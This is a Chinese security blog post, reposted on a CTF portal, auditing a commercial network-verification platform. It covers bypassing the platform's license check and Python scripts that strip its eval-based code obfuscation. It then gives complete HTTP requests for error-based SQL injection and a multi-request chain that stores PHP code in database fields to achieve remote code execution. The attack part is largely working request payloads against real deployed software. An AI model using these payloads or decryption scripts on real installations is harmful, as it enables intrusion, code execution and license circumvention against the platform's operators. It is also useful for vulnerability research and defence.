CTF导航 CTF导航

某网络验证平台代码审计

渗透技巧 2年前 (2022) admin
811 0 0

文章首发于:

火线Zone社区(https://zone.huoxian.cn/)

前言

刚过完年的时候在XXX社区看到了这篇文章《记一次渗透实战-代码审计到getshell》

通过搜索发现对应的是 冰心网络验证 
http://wlyz.bingxs.com/ 于是尝试在本地进行安装进行审计

下载安装包
https://teorun.lanzout.com/izfhn

下载安装后,我们看到如果利用 phpstudy 设定域名,或者非 127.0.0.1 的 ip 地址时均需要进行授权

某网络验证平台代码审计

具体的校验,我们可以查看代码 index.php 中包含了 core/common.php

某网络验证平台代码审计

core/common.php 被进行了加密,猜测是当设定了域名或者 127.0.0.1 的 ip 时,就向官网进行授权验证,所以既可以通过 127.0.0.1 来进行分析,也可以通过屏蔽 host 来实现绕过。

某网络验证平台代码审计

继续进行分析时,发现部分代码进行了加密 core/lib/Db.php

某网络验证平台代码审计

新学到的知识点,通过动态调试来获取文件代码(只在 vscode 上执行成功,phpstom 上会提示 Cannot find a local copy of the file on server 就是本地文件与远程文件不匹配)

我们找到调用加密文件的位置

appadmincontrollerHome.php

某网络验证平台代码审计

管理员登录的地方会调用 core/lib/Db.php 文件,添加断点,启动调试,然后管理员登录

程序执行到断点位置后,单步调试进入程序内部,发现会生成临时文件,将文件进行了解密

某网络验证平台代码审计

如此可以得出所有文件
在线格式化
http://dezend.qiling.org/format/

同时也可以通过这种方法,获取文件的源代码

将文件中的 eval 替换为 echo

某网络验证平台代码审计

某网络验证平台代码审计

将获取的数值替换后半部分,同时 eval 再次替换为 echo

某网络验证平台代码审计

查看网页源代码就获取了文件的代码

某网络验证平台代码审计

根据解密过程写一个解密脚本

import osimport refilename = "index.php"with open(filename, 'r') as read_file:    contents = read_file.read()    decode_content = contents.replace("eval","echo")with open(filename,'w') as write_file:    write_file.write(decode_content)os.system("php "+filename+"> 1.php")with open("1.php", 'r') as read_file:    content1 = read_file.read()    decode_content1 = content1.replace("eval","echo")  with open("1.php", 'w') as write_file:    data = re.findall(';(e.*?;)',decode_content)[0]    data = decode_content.replace(data,decode_content1)    write_file.write(data)os.system("php 1.php > "+filename)os.unlink("1.php")

大佬的解密脚本!!差距呀!!!

import shutilimport osimport re
def decode(fileName):    tempFile = "temp.php"    originContent = open(fileName,'r').read()    dataList = re.findall('(<?php.*?>)',originContent.replace('n', ' ').replace('r', ' '))    fileResult = ""    for data in dataList:        flag = 0        while(1):            Content = open(fileName,'r').read()            if(flag == 0):                Content = data                flag = 1            if len(Content) <= 10:                Content = data            if 'eval' in Content:                tempContent = Content.replace("eval","echo")                open(fileName,'w').write(tempContent)                os.system("php {fileName} > {tempFile}".format(fileName=fileName,tempFile=tempFile))                shutil.copyfile(tempFile, fileName)            else:                try:                    result = re.findall('(eval(.*?);)',data)[0]                    result = data.replace(result,"echo('<?php ');"+Content)                    open(fileName,'w').write(result)                    shutil.copyfile(fileName, tempFile)                    os.system("php {tempFile} > {fileName}".format(tempFile=tempFile,fileName=fileName))                    os.unlink(tempFile)                    break                except:                    open(fileName,'w').write(data)                    shutil.copyfile(fileName, tempFile)                    os.system("php {tempFile} > {fileName}".format(tempFile=tempFile,fileName=fileName))                    os.unlink(tempFile)                    break        fileContent = open(fileName,'r').read()        fileResult += fileContent    open(fileName,'w').write(fileResult)
def banner():    logo = r"""       .__               __          ________                         .___  ______ |  |__ ______    |__| _____   ______    ____  ____  ____   __| _/____  ____ |  |  \____    |  |/        |    |  _/ __ _/ ___/  _  / __ _/ __  |  |_> |   Y  |  |_> >  |  |  Y Y    |    `     ___  __(  <_> / /_/   ___/ |   __/|___|  |   __/__|  |__|_|  / /_______  /___  ___  ____/____ |___  >|__|        /|__|  ______|     /          /     /    /           /    / 
Powered by dota_stBlog's: https://www.wlhhlc.top/"""    print(logo)
def main():    fileName = "test.php"    while(1):        result = open(fileName,'r').read()        print(f"33[1;32m====================...Decrypting...========================33[0m"+"n")        print(result+"n")        print(f"33[1;32m============================================================33[0m")        flag = re.findall(r'({[0-9]})',result)        if flag:            decode(fileName)        else:            print(f"33[1;34m[*]Decryption complete!33[0m")            break
if __name__ == '__main__':    banner()    main()

通过正则匹配找到对应未对 SQL 语句处理的位置

某网络验证平台代码审计

SQL注入

appadmincontrollerCardType::softwareLists

某网络验证平台代码审计

appadminmodelCardType::softwareLists

某网络验证平台代码审计

corelibDb::select

某网络验证平台代码审计

POST /index.php/admin/CardType/softwareLists HTTP/1.1Host: 127.0.0.1Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://127.0.0.1/index.php/admin/Home/showAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: PHPSESSID=8b1o7tqo2aedu3gdrj90v6knq3; admin_u=admin; admin_p=f64atEq5kjA7cR3BwkHZlxS%2BaexYaVI%2FOGRtPdJ4zNJbqw;XDEBUG_SESSION=PHPSTORMConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 49
id=1+and+updatexml(1,concat(1,(select+user())),1)

某网络验证平台代码审计

后台其实存在两个后台 admin 和 agent agent 存在默认用户但是无法登录,所以对应寻找前台注入时应该关注 /api 模块下的数据

appapicontrollerCommon

某网络验证平台代码审计

只要继承了 Common 的类都可以实现sql 注入

某网络验证平台代码审计

POST /index.php/api/SingleCard/1 HTTP/1.1Host: 127.0.0.1Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://127.0.0.1/index.php/admin/Home/showAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: PHPSESSID=8b1o7tqo2aedu3gdrj90v6knq3; admin_u=admin; admin_p=f64atEq5kjA7cR3BwkHZlxS%2BaexYaVI%2FOGRtPdJ4zNJbqw;XDEBUG_SESSION=PHPSTORMConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 56
data=1&id=1+and+updatexml(1,concat(1,(select+user())),1)

某网络验证平台代码审计

命令执行 

某网络验证平台代码审计

某网络验证平台代码审计

我们全局搜索 eval ,发现会去执行从数据库查询的值。而通过注入我们这个值是可控的

某网络验证平台代码审计

如此构造注入语句的话就可以实现代码执行,但是我们在前端进行测试的时候,并未成功

某网络验证平台代码审计

单引号会被转义,所以无法执行成功,我们已经知道会去执行数据库中的值,我们现在就是要找到传入并可控的位置

app/admin/model/Software.php 中有对 software 数据库的添加操作,但是对应需要设定的两个字段 defined_encrypt 与 encrypt 均为设定的值

某网络验证平台代码审计

通过 editEncrypt 可以对参数 defined_encrypt 与 encrypt 进行修改

appadmincontrollerSoftware::editEncrypt

某网络验证平台代码审计

所以构造这三个数据包,就可以实现代码执行了

POST /index.php/admin/Software/add HTTP/1.1Host: 127.0.0.1Content-Length: 275Accept: */*X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Origin: http://127.0.0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://127.0.0.1/index.php/admin/Home/show?mod=softwareAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: PHPSESSID=8b1o7tqo2aedu3gdrj90v6knq3; admin_u=admin; admin_p=12b4fOEuLS6NdNA66%2BSCwJW%2Fe1VAVumKiPYiObDFehqzOgConnection: close
name=1&heart_time=180&version=1&notice=1&static_data=1&give_time=1&give_point=1&login_type=1&update_data=1&update_type=1&trial_interval=1&trial_data=1&software_state=1&binding_type=1&bindingdel_type=1&bindingdel_time=1&bindingdel_point=1&restrict_regtime=24&restrict_regnum=3

某网络验证平台代码审计

POST /index.php/admin/Software/editEncrypt HTTP/1.1Host: 127.0.0.1Content-Length: 55Accept: */*X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Origin: http://127.0.0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://127.0.0.1/index.php/admin/Home/show?mod=softwareAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: PHPSESSID=8b1o7tqo2aedu3gdrj90v6knq3; admin_u=admin; admin_p=12b4fOEuLS6NdNA66%2BSCwJW%2Fe1VAVumKiPYiObDFehqzOgConnection: close
id=2&encrypt=defined_encrypt&defined_encrypt=phpinfo();

某网络验证平台代码审计

POST /index.php/api/SingleCard/1 HTTP/1.1Host: 127.0.0.1Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://127.0.0.1/index.php/admin/Home/showAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: PHPSESSID=8b1o7tqo2aedu3gdrj90v6knq3; admin_u=admin; admin_p=f64atEq5kjA7cR3BwkHZlxS%2BaexYaVI%2FOGRtPdJ4zNJbqw;XDEBUG_SESSION=PHPSTORMConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 11
data=1&id=2

某网络验证平台代码审计

另一条链路需要构造这样的数据包

POST /index.php/admin/Software/add HTTP/1.1Host: 127.0.0.1Content-Length: 275Accept: */*X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Origin: http://127.0.0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://127.0.0.1/index.php/admin/Home/show?mod=softwareAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: PHPSESSID=8b1o7tqo2aedu3gdrj90v6knq3; admin_u=admin; admin_p=12b4fOEuLS6NdNA66%2BSCwJW%2Fe1VAVumKiPYiObDFehqzOgConnection: close
name=1&heart_time=180&version=1&notice=1&static_data=1&give_time=1&give_point=1&login_type=1&update_data=1&update_type=1&trial_interval=1&trial_data=1&software_state=1&binding_type=1&bindingdel_type=1&bindingdel_time=1&bindingdel_point=1&restrict_regtime=24&restrict_regnum=3

某网络验证平台代码审计

POST /index.php/admin/Software/editEncrypt HTTP/1.1Host: 127.0.0.1Content-Length: 34Accept: */*X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Origin: http://127.0.0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://127.0.0.1/index.php/admin/Home/show?mod=softwareAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: PHPSESSID=8b1o7tqo2aedu3gdrj90v6knq3; admin_u=admin; admin_p=12b4fOEuLS6NdNA66%2BSCwJW%2Fe1VAVumKiPYiObDFehqzOgConnection: close
id=3&encrypt=no&defined_encrypt=no

某网络验证平台代码审计

POST /index.php/admin/Software/editRemote HTTP/1.1Host: 127.0.0.1Content-Length: 22Accept: */*X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Origin: http://127.0.0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://127.0.0.1/index.php/admin/Home/show?mod=softwareAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: PHPSESSID=8b1o7tqo2aedu3gdrj90v6knq3; admin_u=admin; admin_p=12b4fOEuLS6NdNA66%2BSCwJW%2Fe1VAVumKiPYiObDFehqzOgConnection: close
id=3&remote=phpinfo();

某网络验证平台代码审计

POST /index.php/api/Software/remoteFun HTTP/1.1Host: 127.0.0.1Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://127.0.0.1/index.php/admin/Home/showAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: PHPSESSID=8b1o7tqo2aedu3gdrj90v6knq3; admin_u=admin; admin_p=f64atEq5kjA7cR3BwkHZlxS%2BaexYaVI%2FOGRtPdJ4zNJbqw;XDEBUG_SESSION=PHPSTORMConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 20
id=3&data={"name":1}

某网络验证平台代码审计

总结

完事儿完事儿!!!图片稍微有点儿糊,我也不知道为啥,粘图也很累。

参考文章

https://forum.butian.net/share/1206

【火线Zone云安全社区群】

进群可以与技术大佬互相交流

进群有机会免费领取节假日礼品

进群可以免费观看技术分享直播

识别二维码回复【社区群】进群

某网络验证平台代码审计

【火线Zone社区周激励】

2022.5.16~ 2022.5.22公告

某网络验证平台代码审计

【相关精选文章】

某网络验证平台代码审计

某网络验证平台代码审计

某网络验证平台代码审计

火线Zone是[火线安全平台]运营的云安全社区,内容涵盖云计算、云安全、漏洞分析、攻防等热门主题,研究讨论云安全相关技术,助力所有云上用户实现全面的安全防护。欢迎具备分享和探索精神的云上用户加入火线Zone社区,共建一个云安全优质社区!

如需转载火线Zone公众号内的文章请联系火线小助手:hxanquan(微信)

某网络验证平台代码审计

//  火线Zone //

微信号 : huoxian_zone

某网络验证平台代码审计

点击阅读原文,加入社区,共建一个有技术氛围的优质社区!

原文始发于微信公众号(火线Zone):某网络验证平台代码审计

版权声明:admin 发表于 2022年5月24日 下午6:01。
转载请注明:某网络验证平台代码审计 | CTF导航

相关文章

BROP 攻击技术 | PWN
admin
1,053
Bug Bounty | 一些赏金案例
admin
920
How the Saitama backdoor uses DNS tunnelling
admin
619
Vim 一下日志文件,Java 进程没了?
admin
30
每日安全动态推送(3-7)
admin
17
AddressSanitizer 漏洞检测技术剖析
admin
620

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...

相关文章

每日安全动态推送(4-18)
0
Weblogic RCE(CVE-2024-21006)
0
OpenClinic GA 5.247.01 – Path Traversal (Authenticated)
0
Jenkins 2.441 – Local File Inclusion
0
Catcher(捕手)
0
CVE-2024-2448: Authenticated Command Injection In Progress Kemp LoadMaster
0
PoC Exploit Released for 0-day Windows Kernel Elevation of Privilege Vulnerability (CVE-2024-21338)
0
Active Directory – Read Only Domain Controller
0
每日安全动态推送(4-16)
0
每日安全动态推送(4-15)
0